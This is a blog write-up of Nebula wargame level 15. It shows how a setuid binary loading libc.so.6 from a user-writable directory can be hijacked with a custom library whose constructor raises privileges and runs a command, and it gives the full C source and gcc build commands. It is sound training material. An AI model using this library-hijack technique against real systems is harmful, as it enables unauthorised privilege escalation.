blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 15

Problem

  1. This is again a problem of lazy permissions.

Exploit

The binary havily tries to load the library libc.so.6 from various directories until it gives up and loads the system’s default one. As one might recognize the user level15 has write-access to one of those directories. The aim is to write a custom libc.so.6 and place it inside the directory /var/tmp/flag15. There are several ways on how to create this library. I’ll refer to stackoverflow.com and dbp-consulting.com. That pages helped me understanding the context.

Create the source- and the version-file - /tmp/level15.c and /tmp/version.

1
2
3
4
5
6
7
8
9
#include <unistd.h>
#include <stdlib.h>

void __attribute__((constructor)) init()
{
        int euid = geteuid();
        setresuid(euid, euid, euid);
        system("/bin/getflag");
}
1
GLIBC_2.0 {};

Use gcc to create an object-file and afterwards the library:

1
2
3
gcc -fPIC -g -c /tmp/level15.c -o /tmp/level15.o
gcc -shared -Wl,--version-script,/tmp/version,-Bstatic /tmp/level15.o -static-libgcc \
    -o /var/tmp/flag15/libc.so.6 

As a last step just execute the binary and get the flag /home/flag15/flag15. One might notice the “relocation error”. This error occures if linked against a libc version smaller than 2.3. file /lib/i386-linux-gnu/libc.so.6 reveals, that the custom lib is linked against libc-2.13.so. A solution is to upgrade the whole system… or one accepts, that the flag was captured successfully. See www.novell.com for more details.

Lesson / How to fix

  1. Use strict permissions! The rest of this level was just syntactic sugar ;-)

other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19